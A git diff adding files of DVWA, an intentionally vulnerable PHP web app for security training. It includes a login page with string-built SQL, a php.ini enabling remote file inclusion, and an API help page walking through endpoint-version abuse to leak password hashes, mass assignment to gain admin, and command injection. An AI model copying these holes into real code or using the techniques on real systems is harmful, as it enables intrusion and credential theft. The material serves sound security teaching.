    We do not take responsibility for the way in which any one uses this application (DVWA). We have made the purposes of the application clear and it should not be used maliciously. We have given warnings and taken measures to prevent users from installing DVWA on to live web servers. If your web server is compromised via an installation of DVWA it is not our responsibility it is the responsibility of the person/s who uploaded and installed it.

    +
    +
    + +

    More Training Resources

    +

    DVWA aims to cover the most commonly seen vulnerabilities found in today's web applications. However there are plenty of other issues with web applications. Should you wish to explore any additional attack vectors, or want more difficult challenges, you may wish to look into the following other projects:

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://github.com/webpwnized/mutillidae', 'Mutillidae') . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-vulnerable-web-applications-directory', 'OWASP Vulnerable Web Applications Directory') . "
      • +
    +
    +
    +"; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/instructions.php b/DVWA/instructions.php new file mode 100644 index 00000000..18e8d4dc --- /dev/null +++ b/DVWA/instructions.php @@ -0,0 +1,67 @@ + array( 'type' => 'markdown', 'legend' => 'Read Me', 'file' => 'README.md' ), + 'PDF' => array( 'type' => 'html' ,'legend' => 'PDF Guide', 'file' => 'docs/pdf.html' ), + 'changelog' => array( 'type' => 'markdown', 'legend' => 'Change Log', 'file' => 'CHANGELOG.md' ), + 'copying' => array( 'type' => 'markdown', 'legend' => 'Copying', 'file' => 'COPYING.txt' ), +); + +$selectedDocId = isset( $_GET[ 'doc' ] ) ? $_GET[ 'doc' ] : ''; +if( !array_key_exists( $selectedDocId, $docs ) ) { + $selectedDocId = 'readme'; +} +$readFile = $docs[ $selectedDocId ][ 'file' ]; + +$instructions = file_get_contents( DVWA_WEB_PAGE_TO_ROOT.$readFile ); + +if ($docs[ $selectedDocId ]['type'] == "markdown") { + $parsedown = new ParseDown(); + $instructions = $parsedown->text($instructions); +} + +/* +function urlReplace( $matches ) { + return dvwaExternalLinkUrlGet( $matches[1] ); +} + +// Make links and obfuscate the referer... +$instructions = preg_replace_callback( + '/((http|https|ftp):\/\/([[:alnum:]|.|\/|?|=]+))/', + 'urlReplace', + $instructions +); + +$instructions = nl2br( $instructions ); +*/ +$docMenuHtml = ''; +foreach( array_keys( $docs ) as $docId ) { + $selectedClass = ( $docId == $selectedDocId ) ? ' selected' : ''; + $docMenuHtml .= "{$docs[$docId]['legend']}"; +} +$docMenuHtml = "
    {$docMenuHtml}
    "; + +$page[ 'body' ] .= " +
    +

    Instructions

    + + {$docMenuHtml} + + + {$instructions} + +
    "; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/login.php b/DVWA/login.php new file mode 100644 index 00000000..c8c7268f --- /dev/null +++ b/DVWA/login.php @@ -0,0 +1,137 @@ +Need to run 'setup.php'." ); + dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'setup.php' ); + } + + $query = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';"; + $result = @mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '
    ' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '.
    Try installing again.
    ' ); + if( $result && mysqli_num_rows( $result ) == 1 ) { // Login Successful... + dvwaMessagePush( "You have logged in as '{$user}'" ); + dvwaLogin( $user ); + dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'index.php' ); + } + + // Login failed + dvwaMessagePush( 'Login failed' ); + dvwaRedirect( 'login.php' ); +} + +$messagesHtml = messagesPopAllToHtml(); + +Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1 +Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... +Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past + +// Anti-CSRF +generateSessionToken(); + +echo " + + + + + + + + Login :: Damn Vulnerable Web Application (DVWA) + + + + + + + +
    + +
    + +
    + +

    + +
    + +
    + +
    + +
    + +
    + +
    + + +
    + +
    + +

    + +
    + + " . tokenField() . " + +
    + +
    + + {$messagesHtml} + +
    +
    +
    +
    +
    +
    +
    +
    + +
    + +
    + +

    " . dvwaExternalLinkUrlGet( 'https://github.com/digininja/DVWA/', 'Damn Vulnerable Web Application (DVWA)' ) . "

    + +
    + +
    + + + +"; + +?> diff --git a/DVWA/logout.php b/DVWA/logout.php new file mode 100644 index 00000000..07b65eb4 --- /dev/null +++ b/DVWA/logout.php @@ -0,0 +1,17 @@ + diff --git a/DVWA/php.ini b/DVWA/php.ini new file mode 100644 index 00000000..f4707128 --- /dev/null +++ b/DVWA/php.ini @@ -0,0 +1,5 @@ +; This file attempts to overwrite the original php.ini file. Doesnt always work. + +magic_quotes_gpc = Off +allow_url_fopen = on +allow_url_include = on diff --git a/DVWA/phpinfo.php b/DVWA/phpinfo.php new file mode 100644 index 00000000..1c34a21d --- /dev/null +++ b/DVWA/phpinfo.php @@ -0,0 +1,10 @@ + diff --git a/DVWA/robots.txt b/DVWA/robots.txt new file mode 100644 index 00000000..77470cb3 --- /dev/null +++ b/DVWA/robots.txt @@ -0,0 +1,2 @@ +User-agent: * +Disallow: / \ No newline at end of file diff --git a/DVWA/security.php b/DVWA/security.php new file mode 100644 index 00000000..2652d932 --- /dev/null +++ b/DVWA/security.php @@ -0,0 +1,82 @@ +Security level is currently: $securityLevel.

    "; + } + $securityOptionsHtml .= ""; +} + +// Anti-CSRF +generateSessionToken(); + +$page[ 'body' ] .= " +

    +

    DVWA Security

    +
    + +

    Security Level

    + + {$securityHtml} + +
    + {$securityLevelHtml} +

    You can set the security level to low, medium, high or impossible. The security level changes the vulnerability level of DVWA:

    +
      +
    1. Low - This security level is completely vulnerable and has no security measures at all. It's use is to be as an example of how web application vulnerabilities manifest through bad coding practices and to serve as a platform to teach or learn basic exploitation techniques.
      2. +
    2. Medium - This setting is mainly to give an example to the user of bad security practices, where the developer has tried but failed to secure an application. It also acts as a challenge to users to refine their exploitation techniques.
      3. +
    3. High - This option is an extension to the medium difficulty, with a mixture of harder or alternative bad practices to attempt to secure the code. The vulnerability may not allow the same extent of the exploitation, similar in various Capture The Flags (CTFs) competitions.
      4. +
    4. Impossible - This level should be secure against all vulnerabilities. It is used to compare the vulnerable source code to the secure source code.
      + Prior to DVWA v1.9, this level was known as 'high'.
      5. +
    + + + " . tokenField() . " +
    +
    "; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/security.txt b/DVWA/security.txt new file mode 100644 index 00000000..671e87d5 --- /dev/null +++ b/DVWA/security.txt @@ -0,0 +1 @@ +The clue is in its name, DVWA contains both intentional and unintentional vulnerabliities, that is it's whole point, please do not try to report them. diff --git a/DVWA/setup.php b/DVWA/setup.php new file mode 100644 index 00000000..79a011de --- /dev/null +++ b/DVWA/setup.php @@ -0,0 +1,156 @@ +Unknown

    "; +$mod_rewrite = "Unknown
    "; + +if (PHP_OS == "Linux") { + if (is_dir (".git")) { + $git_log = shell_exec ("git -c 'safe.directory=*' log -1"); + if (!is_null ($git_log)) { + $tmp = explode ("\n", $git_log); + $date = str_replace ("Date: ", "Date: ", $tmp[2]); + $git_ref = "
    • " . str_replace ("commit ", "Git reference: ", $tmp[0]) . "
    • " . $date . "
    "; + } + } + + $out = shell_exec ("apachectl -M | grep rewrite_module"); + if ($out == "") { + $mod_rewrite = "Not Enabled
    "; + } else { + $mod_rewrite = "Enabled
    "; + } +} + +if (!is_dir ("./vulnerabilities/api/vendor")) { + $vendor = "Not Installed

    "; + $vendor .= "For information on how to install these, see the README.
    "; +} else { + $vendor = "Installed
    "; +} + +$phpVersionWarning = ""; + +if (version_compare(phpversion(), '6', '<')) { + $phpVersionWarning = "Versions of PHP below 7.x are not supported, please upgrade.

    "; +} elseif (version_compare(phpversion(), '7.3', '<')) { + $phpVersionWarning = "Versions of PHP below 7.3 may work but have known problems, please upgrade.

    "; +} + +$page[ 'body' ] .= " +
    +

    Database Setup

    + +

    Click on the 'Create / Reset Database' button below to create or reset your database.
    + If you get an error make sure you have the correct user credentials in: " . realpath( getcwd() . DIRECTORY_SEPARATOR . "config" . DIRECTORY_SEPARATOR . "config.inc.php" ) . "

    + +

    If the database already exists, it will be cleared and the data will be reset.
    + You can also use this to reset the administrator credentials (\"admin // password\") at any stage.

    +
    +
    + +

    Setup Check

    + + General
    + {$DVWAOS}
    +
    + DVWA version: {$git_ref} +
    + {$DVWARecaptcha}
    +
    + {$DVWAUploadsWrite}
    + {$bakWritable} +
    +
    + + Apache
    + {$SERVER_NAME}

    + mod_rewrite: {$mod_rewrite} + mod_rewrite is required for the AP labs.

    + + PHP
    + PHP version: " . phpversion() . "
    + {$phpVersionWarning} + {$phpDisplayErrors}
    + {$phpDisplayStartupErrors}
    + {$phpURLInclude}
    + {$phpURLFopen}
    + {$phpGD}
    + {$phpMySQL}
    + {$phpPDO}
    +
    + Database
    + Backend database: {$database_type_name}
    + {$MYSQL_USER}
    + {$MYSQL_PASS}
    + {$MYSQL_DB}
    + {$MYSQL_SERVER}
    + {$MYSQL_PORT}
    +
    + API
    + This section is only important if you want to use the API module.
    + Vendor files installed: {$vendor}
    + + Status in red, indicate there will be an issue when trying to complete some modules.
    +
    + If you see disabled on either allow_url_fopen or allow_url_include, set the following in your php.ini file and restart Apache.
    + 
    allow_url_fopen = On
+allow_url_include = On
    + These are only required for the file inclusion labs so unless you want to play with those, you can ignore them. + +


    + + +
    + + " . tokenField() . " +
    +
    +
    +
    "; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/tests/README.md b/DVWA/tests/README.md new file mode 100644 index 00000000..31f34892 --- /dev/null +++ b/DVWA/tests/README.md @@ -0,0 +1,14 @@ +# Tests + +## Usage + +To run these scripts manually, run the following from the document root: + +``` +python3 -m pytest -s +``` + +## test_url.py + +This test will find all fully qualified URLs mentioned in any PHP script and will check if the URL is still alive. This helps weed out dead links from documentation and references. + diff --git a/DVWA/tests/test_url.py b/DVWA/tests/test_url.py new file mode 100644 index 00000000..af27d21b --- /dev/null +++ b/DVWA/tests/test_url.py @@ -0,0 +1,90 @@ +import glob +import re +import requests +import time + + +def get_php_files(): + patterns = ["*.php", "*/*.php", "*/*/*.php"] + files = [] + ignore_files = ["dvwa/includes/Parsedown.php"] + for pattern in patterns: + files.extend(glob.glob(pattern)) + for ignore_file in ignore_files: + if ignore_file in files: + files.remove(ignore_file) + return files + + +def get_urls(filename): + with open(filename, 'r') as f: + content = f.read() + matches = re.findall("[\'\"](https?://.*?)[\'\"]", content) + return matches + + +def check_once(url): + try: + headers = { + 'User-Agent': + 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36' + } + response = requests.get(url, headers=headers) + except requests.exceptions.ConnectionError: + return False, -1 + return response.ok, response.status_code + + +def check(url): + # We try for 5 times, with 3 seconds interval. + try_count = 5 + try_interval = 3 + for i in range(try_count): + ok, status_code = check_once(url) + if ok: + break + time.sleep(try_interval) + return ok, status_code + + +def test_url(): + # Need to rewrite this so it generates a single, unique list of URLs, + # removes any which are to be ignored, and then checks them. Would be + # much cleaner. + + ignore_urls = [ + "https://wpscan.com/", # Cloudflare doesn't like GitHub checking it + "http://www.w3.org/TR/html4/loose.dtd", # Don't need to check the DTD + "https://www.vmware.com/", # Throwing a 403 for some reason, but can't see it going anywhere + "https://twitter.com/digininja", # Twitter doesn't like GitHub checking it + "https://www.cgisecurity.com/xss-faq.html", # Throwing a 403 for some reason, but can't see it going anywhere + "https://www.cgisecurity.com/csrf-faq.html", # Throwing a 403 for some reason, but can't see it going anywhere + ] + all_urls = [] + broken_urls = [] + for php_file in get_php_files(): + for url in get_urls(php_file): + all_urls.append(url) + + # This removes any duplicates + dedup_urls = list(dict.fromkeys(all_urls)) + + for url in dedup_urls: + if not url in ignore_urls: + # print("checking %s" % url) + ok, status_code = check(url) + if not ok: + # The php_file variable is now broken as it was set in a previous loop + # and doesn't come across into this one. + + #print("failed to access %s from file %s with code %d" % (url, php_file, status_code)) + # broken_urls.append((php_file, url, status_code)) + broken_urls.append((url, status_code)) + + #for php_file, url, status_code in broken_urls: + # print("%s\t%s\t%d" % (php_file, url, status_code)) + + for url, status_code in broken_urls: + print("%s\t%d" % (url, status_code)) + + assert len(broken_urls) == 0, "Broken URLs Detected." diff --git a/DVWA/vulnerabilities/api/.gitignore b/DVWA/vulnerabilities/api/.gitignore new file mode 100644 index 00000000..48b8bf90 --- /dev/null +++ b/DVWA/vulnerabilities/api/.gitignore @@ -0,0 +1 @@ +vendor/ diff --git a/DVWA/vulnerabilities/api/.htaccess b/DVWA/vulnerabilities/api/.htaccess new file mode 100644 index 00000000..f0350352 --- /dev/null +++ b/DVWA/vulnerabilities/api/.htaccess @@ -0,0 +1,10 @@ + + RewriteEngine On + # If an existing asset or directory is requested go to it as it is + RewriteCond %{DOCUMENT_ROOT}%{REQUEST_URI} -f [OR] + RewriteCond %{DOCUMENT_ROOT}%{REQUEST_URI} -d + RewriteRule ^ - [L] + + # Route all other calls through the API + RewriteRule ^ public/index.php + diff --git a/DVWA/vulnerabilities/api/README.md b/DVWA/vulnerabilities/api/README.md new file mode 100644 index 00000000..025c698e --- /dev/null +++ b/DVWA/vulnerabilities/api/README.md @@ -0,0 +1,27 @@ +# API Info + +## Generating OpenAPI Docs + +If you want to be able to modify the code and generate your own OpenAPI document you will need to set a few things up. + +First, make sure you have Composer installed. There seem to be backward compatibility issues so I always get the latest version from here: + + + +Follow the instructions the site gives to get it installed. + +Now go into `/vulnerabilities/api` directory and run: + +``` +composer.phar install +``` + +If you did not install Composer to the system path, make sure you reference its full location. + +With this installed, you should now be able to browse to `/vulnerabilities/api/gen_openapi.php` and download a dynamically generated OpenAPI file + +## Mark Up + +The OpenAPI document is generated using [swagger-php](https://github.com/zircote/swagger-php). + +The file is marked up using the newer PHP attributes method, for more information on that, see their [documentation](https://zircote.github.io/swagger-php/guide/attributes.html). diff --git a/DVWA/vulnerabilities/api/bootstrap.php b/DVWA/vulnerabilities/api/bootstrap.php new file mode 100644 index 00000000..a999c2c2 --- /dev/null +++ b/DVWA/vulnerabilities/api/bootstrap.php @@ -0,0 +1,2 @@ +=8.0.0" + }, + "type": "library", + "extra": { + "branch-alias": { + "dev-master": "3.x-dev" + } + }, + "autoload": { + "psr-4": { + "Psr\\Log\\": "src" + } + }, + "notification-url": "https://packagist.org/downloads/", + "license": [ + "MIT" + ], + "authors": [ + { + "name": "PHP-FIG", + "homepage": "https://www.php-fig.org/" + } + ], + "description": "Common interface for logging libraries", + "homepage": "https://github.com/php-fig/log", + "keywords": [ + "log", + "psr", + "psr-3" + ], + "support": { + "source": "https://github.com/php-fig/log/tree/3.0.2" + }, + "time": "2024-09-11T13:17:53+00:00" + }, + { + "name": "symfony/deprecation-contracts", + "version": "v3.5.1", + "source": { + "type": "git", + "url": "https://github.com/symfony/deprecation-contracts.git", + "reference": "74c71c939a79f7d5bf3c1ce9f5ea37ba0114c6f6" + }, + "dist": { + "type": "zip", + "url": "https://api.github.com/repos/symfony/deprecation-contracts/zipball/74c71c939a79f7d5bf3c1ce9f5ea37ba0114c6f6", + "reference": "74c71c939a79f7d5bf3c1ce9f5ea37ba0114c6f6", + "shasum": "" + }, + "require": { + "php": ">=8.1" + }, + "type": "library", + "extra": { + "thanks": { + "url": "https://github.com/symfony/contracts", + "name": "symfony/contracts" + }, + "branch-alias": { + "dev-main": "3.5-dev" + } + }, + "autoload": { + "files": [ + "function.php" + ] + }, + "notification-url": "https://packagist.org/downloads/", + "license": [ + "MIT" + ], + "authors": [ + { + "name": "Nicolas Grekas", + "email": "p@tchwork.com" + }, + { + "name": "Symfony Community", + "homepage": "https://symfony.com/contributors" + } + ], + "description": "A generic function and convention to trigger deprecation notices", + "homepage": "https://symfony.com", + "support": { + "source": "https://github.com/symfony/deprecation-contracts/tree/v3.5.1" + }, + "funding": [ + { + "url": "https://symfony.com/sponsor", + "type": "custom" + }, + { + "url": "https://github.com/fabpot", + "type": "github" + }, + { + "url": "https://tidelift.com/funding/github/packagist/symfony/symfony", + "type": "tidelift" + } + ], + "time": "2024-09-25T14:20:29+00:00" + }, + { + "name": "symfony/finder", + "version": "v7.2.2", + "source": { + "type": "git", + "url": "https://github.com/symfony/finder.git", + "reference": "87a71856f2f56e4100373e92529eed3171695cfb" + }, + "dist": { + "type": "zip", + "url": "https://api.github.com/repos/symfony/finder/zipball/87a71856f2f56e4100373e92529eed3171695cfb", + "reference": "87a71856f2f56e4100373e92529eed3171695cfb", + "shasum": "" + }, + "require": { + "php": ">=8.2" + }, + "require-dev": { + "symfony/filesystem": "^6.4|^7.0" + }, + "type": "library", + "autoload": { + "psr-4": { + "Symfony\\Component\\Finder\\": "" + }, + "exclude-from-classmap": [ + "/Tests/" + ] + }, + "notification-url": "https://packagist.org/downloads/", + "license": [ + "MIT" + ], + "authors": [ + { + "name": "Fabien Potencier", + "email": "fabien@symfony.com" + }, + { + "name": "Symfony Community", + "homepage": "https://symfony.com/contributors" + } + ], + "description": "Finds files and directories via an intuitive fluent interface", + "homepage": "https://symfony.com", + "support": { + "source": "https://github.com/symfony/finder/tree/v7.2.2" + }, + "funding": [ + { + "url": "https://symfony.com/sponsor", + "type": "custom" + }, + { + "url": "https://github.com/fabpot", + "type": "github" + }, + { + "url": "https://tidelift.com/funding/github/packagist/symfony/symfony", + "type": "tidelift" + } + ], + "time": "2024-12-30T19:00:17+00:00" + }, + { + "name": "symfony/polyfill-ctype", + "version": "v1.31.0", + "source": { + "type": "git", + "url": "https://github.com/symfony/polyfill-ctype.git", + "reference": "a3cc8b044a6ea513310cbd48ef7333b384945638" + }, + "dist": { + "type": "zip", + "url": "https://api.github.com/repos/symfony/polyfill-ctype/zipball/a3cc8b044a6ea513310cbd48ef7333b384945638", + "reference": "a3cc8b044a6ea513310cbd48ef7333b384945638", + "shasum": "" + }, + "require": { + "php": ">=7.2" + }, + "provide": { + "ext-ctype": "*" + }, + "suggest": { + "ext-ctype": "For best performance" + }, + "type": "library", + "extra": { + "thanks": { + "url": "https://github.com/symfony/polyfill", + "name": "symfony/polyfill" + } + }, + "autoload": { + "files": [ + "bootstrap.php" + ], + "psr-4": { + "Symfony\\Polyfill\\Ctype\\": "" + } + }, + "notification-url": "https://packagist.org/downloads/", + "license": [ + "MIT" + ], + "authors": [ + { + "name": "Gert de Pagter", + "email": "BackEndTea@gmail.com" + }, + { + "name": "Symfony Community", + "homepage": "https://symfony.com/contributors" + } + ], + "description": "Symfony polyfill for ctype functions", + "homepage": "https://symfony.com", + "keywords": [ + "compatibility", + "ctype", + "polyfill", + "portable" + ], + "support": { + "source": "https://github.com/symfony/polyfill-ctype/tree/v1.31.0" + }, + "funding": [ + { + "url": "https://symfony.com/sponsor", + "type": "custom" + }, + { + "url": "https://github.com/fabpot", + "type": "github" + }, + { + "url": "https://tidelift.com/funding/github/packagist/symfony/symfony", + "type": "tidelift" + } + ], + "time": "2024-09-09T11:45:10+00:00" + }, + { + "name": "symfony/yaml", + "version": "v7.2.3", + "source": { + "type": "git", + "url": "https://github.com/symfony/yaml.git", + "reference": "ac238f173df0c9c1120f862d0f599e17535a87ec" + }, + "dist": { + "type": "zip", + "url": "https://api.github.com/repos/symfony/yaml/zipball/ac238f173df0c9c1120f862d0f599e17535a87ec", + "reference": "ac238f173df0c9c1120f862d0f599e17535a87ec", + "shasum": "" + }, + "require": { + "php": ">=8.2", + "symfony/deprecation-contracts": "^2.5|^3.0", + "symfony/polyfill-ctype": "^1.8" + }, + "conflict": { + "symfony/console": "<6.4" + }, + "require-dev": { + "symfony/console": "^6.4|^7.0" + }, + "bin": [ + "Resources/bin/yaml-lint" + ], + "type": "library", + "autoload": { + "psr-4": { + "Symfony\\Component\\Yaml\\": "" + }, + "exclude-from-classmap": [ + "/Tests/" + ] + }, + "notification-url": "https://packagist.org/downloads/", + "license": [ + "MIT" + ], + "authors": [ + { + "name": "Fabien Potencier", + "email": "fabien@symfony.com" + }, + { + "name": "Symfony Community", + "homepage": "https://symfony.com/contributors" + } + ], + "description": "Loads and dumps YAML files", + "homepage": "https://symfony.com", + "support": { + "source": "https://github.com/symfony/yaml/tree/v7.2.3" + }, + "funding": [ + { + "url": "https://symfony.com/sponsor", + "type": "custom" + }, + { + "url": "https://github.com/fabpot", + "type": "github" + }, + { + "url": "https://tidelift.com/funding/github/packagist/symfony/symfony", + "type": "tidelift" + } + ], + "time": "2025-01-07T12:55:42+00:00" + }, + { + "name": "zircote/swagger-php", + "version": "4.11.1", + "source": { + "type": "git", + "url": "https://github.com/zircote/swagger-php.git", + "reference": "7df10e8ec47db07c031db317a25bef962b4e5de1" + }, + "dist": { + "type": "zip", + "url": "https://api.github.com/repos/zircote/swagger-php/zipball/7df10e8ec47db07c031db317a25bef962b4e5de1", + "reference": "7df10e8ec47db07c031db317a25bef962b4e5de1", + "shasum": "" + }, + "require": { + "ext-json": "*", + "php": ">=7.2", + "psr/log": "^1.1 || ^2.0 || ^3.0", + "symfony/deprecation-contracts": "^2 || ^3", + "symfony/finder": ">=2.2", + "symfony/yaml": ">=3.3" + }, + "require-dev": { + "composer/package-versions-deprecated": "^1.11", + "doctrine/annotations": "^1.7 || ^2.0", + "friendsofphp/php-cs-fixer": "^2.17 || 3.62.0", + "phpstan/phpstan": "^1.6", + "phpunit/phpunit": ">=8", + "vimeo/psalm": "^4.23" + }, + "suggest": { + "doctrine/annotations": "^1.7 || ^2.0" + }, + "bin": [ + "bin/openapi" + ], + "type": "library", + "extra": { + "branch-alias": { + "dev-master": "4.x-dev" + } + }, + "autoload": { + "psr-4": { + "OpenApi\\": "src" + } + }, + "notification-url": "https://packagist.org/downloads/", + "license": [ + "Apache-2.0" + ], + "authors": [ + { + "name": "Robert Allen", + "email": "zircote@gmail.com" + }, + { + "name": "Bob Fanger", + "email": "bfanger@gmail.com", + "homepage": "https://bfanger.nl" + }, + { + "name": "Martin Rademacher", + "email": "mano@radebatz.net", + "homepage": "https://radebatz.net" + } + ], + "description": "swagger-php - Generate interactive documentation for your RESTful API using phpdoc annotations", + "homepage": "https://github.com/zircote/swagger-php/", + "keywords": [ + "api", + "json", + "rest", + "service discovery" + ], + "support": { + "issues": "https://github.com/zircote/swagger-php/issues", + "source": "https://github.com/zircote/swagger-php/tree/4.11.1" + }, + "time": "2024-10-15T19:20:02+00:00" + } + ], + "packages-dev": [], + "aliases": [], + "minimum-stability": "stable", + "stability-flags": {}, + "prefer-stable": false, + "prefer-lowest": false, + "platform": {}, + "platform-dev": {}, + "plugin-api-version": "2.6.0" +} diff --git a/DVWA/vulnerabilities/api/gen_openapi.php b/DVWA/vulnerabilities/api/gen_openapi.php new file mode 100644 index 00000000..0497a39f --- /dev/null +++ b/DVWA/vulnerabilities/api/gen_openapi.php @@ -0,0 +1,12 @@ +toYaml(); diff --git a/DVWA/vulnerabilities/api/help/help.php b/DVWA/vulnerabilities/api/help/help.php new file mode 100644 index 00000000..ec80928e --- /dev/null +++ b/DVWA/vulnerabilities/api/help/help.php @@ -0,0 +1,147 @@ + + +
    +

    Help - API Security

    + +
    + + + + +
    +

    About

    +

    + Most modern web apps use some kind of API, either as Single Page Apps (SPAs) or to retrieve data to populate traditional apps. As these APIs are behind the scenes, developers sometimes feel they can cut corners in areas such as authentication, authorisation or data validation. As testers, we can get behind the curtains and directly access these seemingly hidden calls to take advantage of these weaknesses. +

    +

    + This module will look at three weaknesses, versioning, mass assignment, and ..... +

    + +

    + +

    Objective

    +

    Each level has its own objective but the general idea is to exploit weak API implementations.

    + +

    + +

    Low Level

    +

    The call being made by the JavaScript is for version 2 of the endpoint, could there be other, earlier, versions available?

    +

    + +

    +
    +

    Either by looking at the JavaScript or watching network traffic, you should notice that there is a call being made to /vulnerabilities/api/v2/user/ to retrieve the data used to generate the user table.

    +

    + As the call is being made against version two (v2) of the endpoint, the obvious thing to try is to see if version one is available, and what it offers. The easiest way to do this is to access it directly in the browser by visiting /vulnerabilities/api/v1/user/, but sometimes API calls require extra headers or authentication tokens which it is easier to let the site add rather than trying to do it manually. Two ways to do this are to modify the URL used in the JavaScript as the page loads by setting a breakpoint on it and changing it before the request is made, or to intercept the call in a proxy, such as BurpSuite. +

    +

    + Whatever approach you try, by accessing version one of the endpoint, you should be able to see the password hashes as part of the data. +

    +
    + +

    Medium Level

    +

    + Look at the call made by the site, but also look at the swagger docs and see if there are any other parameters you might be able to add that are not currently passed. +

    +

    + +

    +
    +

    When you update your name, a PUT request is made to /vulnerabilities/api/v2/user/2 with the following content:

    + +
    {
+  "name":"morph"
+}
    + +

    + If you look at the swagger docs, the definition for UserUpdate is: +

    + +
    UserUpdate:
+  required:
+    - name
+  properties:
+    name:
+      type: string
+      example: fred
+    type: object
    + +

    + Which is what you are currently passing, but if you have a look at UserAdd you will see an extra parameter: +

    + +
    UserAdd:
+  required:
+    - level
+    - name
+  properties:
+    name:
+      type: string
+      example: fred
+    level:
+      type: integer
+      example: user
+  type: object
    + +

    + Notice the extra level parameter? +

    +

    + In situations like this, it is always worth testing to see if extra parameters which exist on similar calls will also work on the one you are working on. +

    + +

    + To try this, you can either intercept the request in a proxy, or you can modify the JSON before the request is sent to the server. To modify it in the page, you can set a breakpoint in the update_name function, right after the data variable has been created, and modify the variable by using the following in the console: +

    + +
    data = JSON.stringify({name: name, level: 0})
    + +

    + If you do this and then check the JSON sent in the PUT request, you should see: +

    + +
    {
+  name: "hacked",
+  level: 0
+}
    + +

    + And hopefully a congratulations message. +

    +
    + +

    High Level

    +

    Import the four health calls into your testing tool of choice and make sure they are running properly. When they are all working, test them for vulnerabilities.

    + +

    + +

    + +
    +

    The connectivity call takes a target parameter and pings it to check for a connection, this is done by calling the OS ping command and is vulnerable to command injection.

    +

    + For more information on how to exploit this type of issue, see the command injection module. +

    +
    + +

    Impossible Level

    +

    + The challenge here is just to get the login process automated in Postman or your tool of choice. Read the documentation and experiment. To help get things working I piped everything through Burp and watched each call as it was made to see if it matched what I expected. +

    +

    + When the flow works correctly, the initial login will return an access token and a refresh token along with an expires_in value to say how long the access token is valid for. Once the access token has expired, the refresh token will be sent to the refresh endpoint to generate a new access/refresh token pair. +

    +

    + It should be noted that as well as the access token having a fixed lifespan, the refresh token also has a fixed lifespan, once it has expired, the login process has to begin again from scratch. +

    +
    + +
    + +
    diff --git a/DVWA/vulnerabilities/api/index.php b/DVWA/vulnerabilities/api/index.php new file mode 100644 index 00000000..5e03e8fa --- /dev/null +++ b/DVWA/vulnerabilities/api/index.php @@ -0,0 +1,71 @@ +Warning, mod_rewrite is not enabled
    "; + $html .= "See the README for more information.
    "; + } +} + +if (!is_dir ("./vendor")) { + $html .= "Warning, composer has not been run.
    "; + $html .= "See the README for more information.
    "; +} + + +require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/api/source/{$vulnerabilityFile}"; + +$page[ 'body' ] .= "
    +

    Vulnerability: API Security

    + +
    +"; + +$page[ 'body' ] .= " + {$html} +
    + +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/12-API_Testing/00-API_Testing_Overview', "OWASP WSTG API Testing Overview" ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://portswigger.net/bappstore/6bf7574b632847faaaa4eb5e42f1757c', "Burp OpenAPI Parser" ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.zaproxy.org/docs/desktop/addons/openapi-support/', "ZAP OpenAPI Support" ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://swagger.io/tools/swagger-ui/', "Swagger UI" ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.postman.com/', "Postman" ) . "
      • +
    +
    \n"; + +dvwaHtmlEcho( $page ); + +?> + diff --git a/DVWA/vulnerabilities/api/openapi.yml b/DVWA/vulnerabilities/api/openapi.yml new file mode 100644 index 00000000..837d40ae --- /dev/null +++ b/DVWA/vulnerabilities/api/openapi.yml @@ -0,0 +1,435 @@ +openapi: 3.0.0 +info: + title: 'DVWA API' + contact: + url: 'https://github.com/digininja/DVWA/' + email: robin@digi.ninja + version: '0.1' +servers: + - + url: 'http://dvwa.test' + description: 'API server' +paths: + /vulnerabilities/api/v2/health/echo: + post: + tags: + - health + description: 'Echo, echo, cho, cho, o o ....' + operationId: echo + requestBody: + description: 'Your words.' + content: + application/json: + schema: + $ref: '#/components/schemas/Words' + responses: + '200': + description: 'Successful operation.' + /vulnerabilities/api/v2/health/connectivity: + post: + tags: + - health + description: 'The server occasionally loses connectivity to other systems and so this can be used to check connectivity status.' + operationId: checkConnectivity + requestBody: + description: 'Remote host.' + content: + application/json: + schema: + $ref: '#/components/schemas/Target' + responses: + '200': + description: 'Successful operation.' + /vulnerabilities/api/v2/health/status: + get: + tags: + - health + description: 'Get the health of the system.' + operationId: getHealthStatus + responses: + '200': + description: 'Successful operation.' + /vulnerabilities/api/v2/health/ping: + get: + tags: + - health + description: 'Simple ping/pong to check connectivity.' + operationId: ping + responses: + '200': + description: 'Successful operation.' + /vulnerabilities/api/v2/login/login: + post: + tags: + - login + description: 'Login as user.' + operationId: login + requestBody: + description: 'The login credentials.' + content: + application/json: + schema: + $ref: '#/components/schemas/Credentials' + responses: + '200': + description: 'Successful operation.' + '401': + description: 'Invalid credentials.' + /vulnerabilities/api/v2/login/check_token: + post: + tags: + - login + description: 'Check a token is valid.' + operationId: check_token + requestBody: + description: 'The token to test.' + content: + application/json: + schema: + $ref: '#/components/schemas/Token' + responses: + '200': + description: 'Successful operation.' + '401': + description: 'Token is invalid.' + '/vulnerabilities/api/v2/order/{id}': + get: + tags: + - order + description: 'Get a order by ID.' + operationId: getOrderByID + parameters: 